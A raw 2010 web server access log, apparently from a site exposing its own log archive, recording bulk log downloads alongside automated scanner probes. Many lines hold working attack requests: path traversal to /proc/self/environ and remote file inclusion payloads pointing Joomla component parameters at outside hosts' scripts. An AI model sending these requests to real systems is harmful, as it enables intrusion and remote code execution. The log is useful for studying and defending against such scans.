178.63.49.141 - - [21/Jun/2010:01:38:57 -0400] "GET /logs/access_log.Q109052900 HTTP/1.1" 200 4356729 "http://www.aceonlinestore.com/logs/access_log.Q109052900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:39:57 -0400] "GET /logs/access_log.Q109053100 HTTP/1.1" 200 1986553 "http://www.aceonlinestore.com/logs/access_log.Q109053100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
85.235.154.15 - - [21/Jun/2010:01:40:38 -0400] "GET /logs/error_log.Q109070600%20%20//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
82.76.12.197 - - [21/Jun/2010:01:40:55 -0400] "GET /logs/access_log.Q110053100/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
193.231.187.33 - - [21/Jun/2010:01:40:59 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
193.231.187.33 - - [21/Jun/2010:01:40:59 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
193.231.187.33 - - [21/Jun/2010:01:40:59 -0400] "GET /logs/error_log.Q109090800//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.810"
163.20.26.5 - - [21/Jun/2010:01:41:09 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
163.20.26.5 - - [21/Jun/2010:01:41:10 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
203.211.149.167 - - [21/Jun/2010:01:41:11 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:41:12 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:41:12 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
178.63.49.141 - - [21/Jun/2010:01:40:20 -0400] "GET /logs/access_log.Q109061600 HTTP/1.1" 200 5728303 "http://www.aceonlinestore.com/logs/access_log.Q109061600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:40:20 -0400] "GET /logs/access_log.Q109061500 HTTP/1.1" 200 5178745 "http://www.aceonlinestore.com/logs/access_log.Q109061500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:40:20 -0400] "GET /logs/access_log.Q109060800 HTTP/1.1" 200 4780020 "http://www.aceonlinestore.com/logs/access_log.Q109060800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:40:20 -0400] "GET /logs/access_log.Q109061400 HTTP/1.1" 200 2160115 "http://www.aceonlinestore.com/logs/access_log.Q109061400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:40:20 -0400] "GET /logs/access_log.Q109061000 HTTP/1.1" 200 4425432 "http://www.aceonlinestore.com/logs/access_log.Q109061000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:40:20 -0400] "GET /logs/access_log.Q109061300 HTTP/1.1" 200 2008810 "http://www.aceonlinestore.com/logs/access_log.Q109061300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:40:20 -0400] "GET /logs/access_log.Q109060900 HTTP/1.1" 200 4908335 "http://www.aceonlinestore.com/logs/access_log.Q109060900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:40:20 -0400] "GET /logs/access_log.Q109061200 HTTP/1.1" 200 4908958 "http://www.aceonlinestore.com/logs/access_log.Q109061200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:40:20 -0400] "GET /logs/access_log.Q109061100 HTTP/1.1" 200 4824283 "http://www.aceonlinestore.com/logs/access_log.Q109061100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:40:20 -0400] "GET /logs/access_log.Q109060700 HTTP/1.1" 200 2068562 "http://www.aceonlinestore.com/logs/access_log.Q109060700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
213.171.37.206 - - [21/Jun/2010:01:41:34 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
213.171.37.206 - - [21/Jun/2010:01:41:34 -0400] "GET /logs/access_log.Q110031400//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.808"
213.171.37.206 - - [21/Jun/2010:01:41:34 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
67.59.156.163 - - [21/Jun/2010:01:41:41 -0400] "GET /logs/error_log.Q109070600%20%20//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
178.63.49.141 - - [21/Jun/2010:01:41:20 -0400] "GET /logs/access_log.Q109061300 HTTP/1.1" 200 2008810 "http://www.aceonlinestore.com/logs/access_log.Q109061300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:41:20 -0400] "GET /logs/access_log.Q109060700 HTTP/1.1" 200 2068562 "http://www.aceonlinestore.com/logs/access_log.Q109060700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
203.211.149.167 - - [21/Jun/2010:01:41:48 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
216.17.105.143 - - [21/Jun/2010:01:41:53 -0400] "GET /logs/access_log.Q110060700/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:01:41:53 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:01:41:54 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.830"
211.234.100.196 - - [21/Jun/2010:01:42:40 -0400] "GET /logs//skin/zero_vote/setup.php?http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
211.234.100.196 - - [21/Jun/2010:01:42:40 -0400] "GET //skin/zero_vote/setup.php?http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
121.78.118.123 - - [21/Jun/2010:01:42:45 -0400] "GET /logs/access_log.Q110050200/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.78.118.123 - - [21/Jun/2010:01:42:45 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
121.78.118.123 - - [21/Jun/2010:01:42:46 -0400] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
178.63.49.141 - - [21/Jun/2010:01:41:46 -0400] "GET /logs/access_log.Q109062500 HTTP/1.1" 200 5016688 "http://www.aceonlinestore.com/logs/access_log.Q109062500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:41:46 -0400] "GET /logs/access_log.Q109062200 HTTP/1.1" 200 4929791 "http://www.aceonlinestore.com/logs/access_log.Q109062200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:41:46 -0400] "GET /logs/access_log.Q109062000 HTTP/1.1" 200 2302740 "http://www.aceonlinestore.com/logs/access_log.Q109062000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:41:46 -0400] "GET /logs/access_log.Q109062600 HTTP/1.1" 200 4172484 "http://www.aceonlinestore.com/logs/access_log.Q109062600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:41:46 -0400] "GET /logs/access_log.Q109061700 HTTP/1.1" 200 4385823 "http://www.aceonlinestore.com/logs/access_log.Q109061700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:41:46 -0400] "GET /logs/access_log.Q109061900 HTTP/1.1" 200 3745986 "http://www.aceonlinestore.com/logs/access_log.Q109061900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:41:46 -0400] "GET /logs/access_log.Q109061800 HTTP/1.1" 200 4635924 "http://www.aceonlinestore.com/logs/access_log.Q109061800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:41:46 -0400] "GET /logs/access_log.Q109062100 HTTP/1.1" 200 1659218 "http://www.aceonlinestore.com/logs/access_log.Q109062100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:41:46 -0400] "GET /logs/access_log.Q109062400 HTTP/1.1" 200 4898892 "http://www.aceonlinestore.com/logs/access_log.Q109062400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:41:46 -0400] "GET /logs/access_log.Q109062300 HTTP/1.1" 200 5026682 "http://www.aceonlinestore.com/logs/access_log.Q109062300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
67.59.156.163 - - [21/Jun/2010:01:42:48 -0400] "GET /logs/error_log.Q109081300%20%20//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.17.105.143 - - [21/Jun/2010:01:42:52 -0400] "GET /logs/access_log.Q110061500/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
216.17.105.143 - - [21/Jun/2010:01:42:53 -0400] "GET /logs/access_log.Q110053100/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
178.63.49.141 - - [21/Jun/2010:01:42:46 -0400] "GET /logs/access_log.Q109062100 HTTP/1.1" 200 1659218 "http://www.aceonlinestore.com/logs/access_log.Q109062100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
174.121.176.46 - - [21/Jun/2010:01:43:05 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
85.235.154.15 - - [21/Jun/2010:01:43:05 -0400] "GET /logs/error_log.Q109081300%20%20//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
82.39.188.43 - - [21/Jun/2010:01:43:19 -0400] "GET //adxmlrpc.php HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
174.121.176.46 - - [21/Jun/2010:01:43:33 -0400] "GET /logs/access_log.Q109120200/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.121.176.46 - - [21/Jun/2010:01:43:34 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
174.121.176.46 - - [21/Jun/2010:01:43:34 -0400] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
62.44.82.118 - - [21/Jun/2010:01:43:39 -0400] "GET /logs/access_log.Q110052400//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
194.108.112.112 - - [21/Jun/2010:01:43:53 -0400] "GET //adxmlrpc.php HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
174.142.75.205 - - [21/Jun/2010:01:43:57 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
174.142.75.205 - - [21/Jun/2010:01:43:57 -0400] "GET /logs/access_log.Q110031400//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
174.142.75.205 - - [21/Jun/2010:01:43:57 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
178.63.49.141 - - [21/Jun/2010:01:42:58 -0400] "GET /logs/access_log.Q109063000 HTTP/1.1" 200 5874408 "http://www.aceonlinestore.com/logs/access_log.Q109063000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:42:58 -0400] "GET /logs/access_log.Q109070100 HTTP/1.1" 200 4008187 "http://www.aceonlinestore.com/logs/access_log.Q109070100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:42:58 -0400] "GET /logs/access_log.Q109062900 HTTP/1.1" 200 5053948 "http://www.aceonlinestore.com/logs/access_log.Q109062900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:42:58 -0400] "GET /logs/access_log.Q109062800 HTTP/1.1" 200 2206435 "http://www.aceonlinestore.com/logs/access_log.Q109062800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:42:58 -0400] "GET /logs/access_log.Q109062700 HTTP/1.1" 200 2243190 "http://www.aceonlinestore.com/logs/access_log.Q109062700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:42:58 -0400] "GET /logs/access_log.Q109070200 HTTP/1.1" 200 5653087 "http://www.aceonlinestore.com/logs/access_log.Q109070200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:42:58 -0400] "GET /logs/access_log.Q109070400 HTTP/1.1" 200 1764892 "http://www.aceonlinestore.com/logs/access_log.Q109070400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:42:58 -0400] "GET /logs/access_log.Q109070600 HTTP/1.1" 200 4677677 "http://www.aceonlinestore.com/logs/access_log.Q109070600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:42:58 -0400] "GET /logs/access_log.Q109070500 HTTP/1.1" 200 2033988 "http://www.aceonlinestore.com/logs/access_log.Q109070500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:42:58 -0400] "GET /logs/access_log.Q109070300 HTTP/1.1" 200 3011957 "http://www.aceonlinestore.com/logs/access_log.Q109070300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
174.142.75.205 - - [21/Jun/2010:01:44:02 -0400] "GET /logs/access_log.Q109122800//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
213.171.37.206 - - [21/Jun/2010:01:44:03 -0400] "GET /logs/error_log.Q110050400//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.808"
193.231.187.33 - - [21/Jun/2010:01:44:11 -0400] "GET /logs/error_log.Q109071900//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.810"
178.63.49.141 - - [21/Jun/2010:01:43:59 -0400] "GET /logs/access_log.Q109070400 HTTP/1.1" 200 1764892 "http://www.aceonlinestore.com/logs/access_log.Q109070400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:43:59 -0400] "GET /logs/access_log.Q109070500 HTTP/1.1" 200 2033988 "http://www.aceonlinestore.com/logs/access_log.Q109070500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
87.106.28.150 - - [21/Jun/2010:01:44:31 -0400] "GET /logs/access_log.Q109122000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
212.176.192.221 - - [21/Jun/2010:01:45:12 -0400] "GET /logs/error_log.Q110051400 HTTP/1.1" 200 2918261 "http://yandex.ru/yandsearch?p=10&text=%22http%3A%2F%2Fcarztuning.ru%22&lr=213" "Opera/9.80 (Windows NT 6.0; U; ru) Presto/2.5.24 Version/10.53"
178.63.49.141 - - [21/Jun/2010:01:44:24 -0400] "GET /logs/access_log.Q109071400 HTTP/1.1" 200 5125803 "http://www.aceonlinestore.com/logs/access_log.Q109071400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:44:24 -0400] "GET /logs/access_log.Q109070900 HTTP/1.1" 200 4950912 "http://www.aceonlinestore.com/logs/access_log.Q109070900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:44:24 -0400] "GET /logs/access_log.Q109070800 HTTP/1.1" 200 4336924 "http://www.aceonlinestore.com/logs/access_log.Q109070800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:44:24 -0400] "GET /logs/access_log.Q109071100 HTTP/1.1" 200 2250018 "http://www.aceonlinestore.com/logs/access_log.Q109071100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:44:24 -0400] "GET /logs/access_log.Q109071600 HTTP/1.1" 200 5481659 "http://www.aceonlinestore.com/logs/access_log.Q109071600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:44:24 -0400] "GET /logs/access_log.Q109071300 HTTP/1.1" 200 4718643 "http://www.aceonlinestore.com/logs/access_log.Q109071300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
174.121.176.46 - - [21/Jun/2010:01:45:24 -0400] "GET /logs/access_log.Q109111400/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.121.176.46 - - [21/Jun/2010:01:45:25 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
178.63.49.141 - - [21/Jun/2010:01:44:24 -0400] "GET /logs/access_log.Q109071000 HTTP/1.1" 200 3921078 "http://www.aceonlinestore.com/logs/access_log.Q109071000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:44:24 -0400] "GET /logs/access_log.Q109071200 HTTP/1.1" 200 2162244 "http://www.aceonlinestore.com/logs/access_log.Q109071200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:44:24 -0400] "GET /logs/access_log.Q109071500 HTTP/1.1" 200 4717248 "http://www.aceonlinestore.com/logs/access_log.Q109071500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
174.121.176.46 - - [21/Jun/2010:01:45:25 -0400] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
178.63.49.141 - - [21/Jun/2010:01:44:24 -0400] "GET /logs/access_log.Q109070700 HTTP/1.1" 200 4914184 "http://www.aceonlinestore.com/logs/access_log.Q109070700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
91.142.214.148 - - [21/Jun/2010:01:45:26 -0400] "GET /logs/access_log.Q109122800///?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
91.142.214.148 - - [21/Jun/2010:01:45:27 -0400] "GET ///?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
91.142.214.148 - - [21/Jun/2010:01:45:27 -0400] "GET /logs///?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt?? HTTP/1.1" 200 55292 "-" "libwww-perl/5.805"
62.44.82.118 - - [21/Jun/2010:01:46:10 -0400] "GET /logs/error_log.Q110061700//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
67.59.156.163 - - [21/Jun/2010:01:46:14 -0400] "GET /logs/error_log.Q109081300%20%20//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
178.63.49.141 - - [21/Jun/2010:01:45:24 -0400] "GET /logs/access_log.Q109071800 HTTP/1.1" 200 2661187 "http://www.aceonlinestore.com/logs/access_log.Q109071800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:45:24 -0400] "GET /logs/access_log.Q109072100 HTTP/1.1" 200 4525475 "http://www.aceonlinestore.com/logs/access_log.Q109072100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:45:24 -0400] "GET /logs/access_log.Q109072300 HTTP/1.1" 200 5083465 "http://www.aceonlinestore.com/logs/access_log.Q109072300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:45:24 -0400] "GET /logs/access_log.Q109072500 HTTP/1.1" 200 2074957 "http://www.aceonlinestore.com/logs/access_log.Q109072500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:45:24 -0400] "GET /logs/access_log.Q109072000 HTTP/1.1" 200 4437917 "http://www.aceonlinestore.com/logs/access_log.Q109072000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:45:24 -0400] "GET /logs/access_log.Q109072600 HTTP/1.1" 200 2133628 "http://www.aceonlinestore.com/logs/access_log.Q109072600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:45:24 -0400] "GET /logs/access_log.Q109071900 HTTP/1.1" 200 2331784 "http://www.aceonlinestore.com/logs/access_log.Q109071900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:45:24 -0400] "GET /logs/access_log.Q109071700 HTTP/1.1" 200 3577551 "http://www.aceonlinestore.com/logs/access_log.Q109071700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:45:24 -0400] "GET /logs/access_log.Q109072400 HTTP/1.1" 200 3768784 "http://www.aceonlinestore.com/logs/access_log.Q109072400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:45:24 -0400] "GET /logs/access_log.Q109072200 HTTP/1.1" 200 5101774 "http://www.aceonlinestore.com/logs/access_log.Q109072200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:46:24 -0400] "GET /logs/access_log.Q109072500 HTTP/1.1" 200 2074957 "http://www.aceonlinestore.com/logs/access_log.Q109072500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
174.121.176.46 - - [21/Jun/2010:01:46:43 -0400] "GET /logs/error_log.Q109120200/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
174.121.176.46 - - [21/Jun/2010:01:46:44 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
174.121.176.46 - - [21/Jun/2010:01:46:44 -0400] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
62.44.82.118 - - [21/Jun/2010:01:47:10 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
209.59.12.99 - - [21/Jun/2010:01:47:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
